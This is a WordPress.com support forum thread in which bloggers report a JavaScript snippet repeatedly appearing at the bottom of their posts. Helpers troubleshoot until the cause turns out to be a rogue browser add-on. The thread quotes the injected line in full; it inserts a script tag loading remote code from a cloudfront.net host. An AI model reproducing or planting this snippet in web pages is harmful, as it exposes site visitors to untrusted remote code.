Code appearing in the bottem of each post

    Every time I try to post, after I publish, this random bit of code appears in the bottom of the post:

    "// -1?'https':'http';var ccm=document.createElement('script');ccm.type='text/javascript';ccm.async=true;ccm.src=http+'://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);jQuery('#cblocker').remove();});};
    // ]]>"

    how do I get this to stop happening?

    The blog I need help with is jesseborg.wordpress.com.

    Are you copying and pasting text from elsewhere into your posts?

    I am having the same difficulty! No copying/pasting involved in my case, at least.

    Which blog are you referring to? Please post a link to an example of this that we can examine.

    Referring to my personal blog in this case. See the bottom of:

    I had the same problem with the post immediately following the one above. Additionally, I have another draft saved where, upon saving, the same strange bit of code seems to have inserted itself into the post. If I attempt to delete it manually, it comes right back.
    And, I am using the theme Vigilance, if that is in any way pertinent here.

    Thanks. I have seen another blogger post who had what appears to be the same code string on their blog earlier today. I have flagged this thread for Staff attention and I'm now going to locate the other thread as well.

    I can't see where that is coming from. Are you using the Visual editor tab, HTML editor tab, full screen editor, or New Post tab at the main WordPress.com page?

    Do you have the same problem if you post from Posts -> Add New in your Dashboard?

    Yes, it would seem that I have the same problem, after previewing an entirely new post.

    Hm, that's very strange.

    Can you please tell us which browser (and version of) you're using?

    Firefox 11.0. On a Mac (OS X 10.6.8) if that is helpful, in any way.

    Can you please try disabling all add-ons to see if that makes any improvement when posting?

    Excellent news! The problem has been resolved; it would seem that it was linked to a bad add-on (one that must have been picked up from a streaming site at some point, from the looks of it). In the end, I disabled it and have been able to remove the code that was automatically inserting itself at the end of each post. For future reference, in my case, at least, the add-on in question seems to have been "codec-M 1.0.0.1".
